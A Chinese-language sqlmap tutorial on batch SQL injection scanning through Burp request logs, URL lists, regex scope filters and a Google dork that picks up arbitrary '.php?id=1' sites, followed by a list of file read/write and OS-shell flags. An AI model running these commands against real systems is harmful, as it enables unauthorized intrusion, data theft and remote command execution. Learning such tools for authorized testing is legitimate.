一.批量化扫描burp的请求日记
01.首先配置burp记录所有的request请求,并保存在指定文件夹,如我保存在sqlmap目录下名为sql.txt。
02.接着浏览器设置burp代理,访问测试url,查看sql.txt。
3.使用sqlmap扫描
sqlmap.py -l sql.txt --batch -smart
Batch:会自动选择yes
Smart:启发式快速判断,节约时间
偷懒的做法,最好不要--batch -samrt了,会错过很多选项导致注入失败。扫描结果可以到C:\Users\Administrator\.sqlmap\output去查看。
二.批量扫描文本中的多个目标
文本中保存url格式如下,sqlmap会一个个检测。
sqlmap.py -m url.txt
三.利用正则过滤目标网址
为什么过滤目标网址,前面批量扫是让我们扫描burp的请求耶,那这么多请求,有的请求并非是我们要扫描的网址怎么办?用正则干掉他吧!!!
参数:--scope
例如:只想要www开头,.com/.net/.org结尾的网址
python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
更多的看各位正则的功底啦。
四.利用谷歌批量扫
如首先用谷歌搜索.php?id=1结尾的URL,然后进行注入测试。
sqlmap.py -g "inurl:\".php?id=1\""
五.关于文件写入与shell获取
--sql-shell #执行指定sql命令
--sql-query #执行指定的sql语句
--file-read#读取指定文件
--file-write #写入本地文件
(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
--file-dest #要写入的文件绝对路径
--os-cmd=id#执行系统命令
--os-shell #系统交互shell
--reg-read#读取win系统注册表
六.总结
此次主要介绍批量化扫描的几个方式,关于文件写入和shell获取,由于我实验环境权限存在问题,所以只是简单的列出命令,希望小伙伴有执行成功的能够告诉斗哥一声啊。好了,sqlmap系列基本也就要告一个段落了,而sqlmap本身还有很多的东西值得我们学习,虽然分成了4个系列,但是只是说如何使用这个工具罢了,还有很多奇淫巧技斗哥也还没有get到,有机会大家一起讨论吧。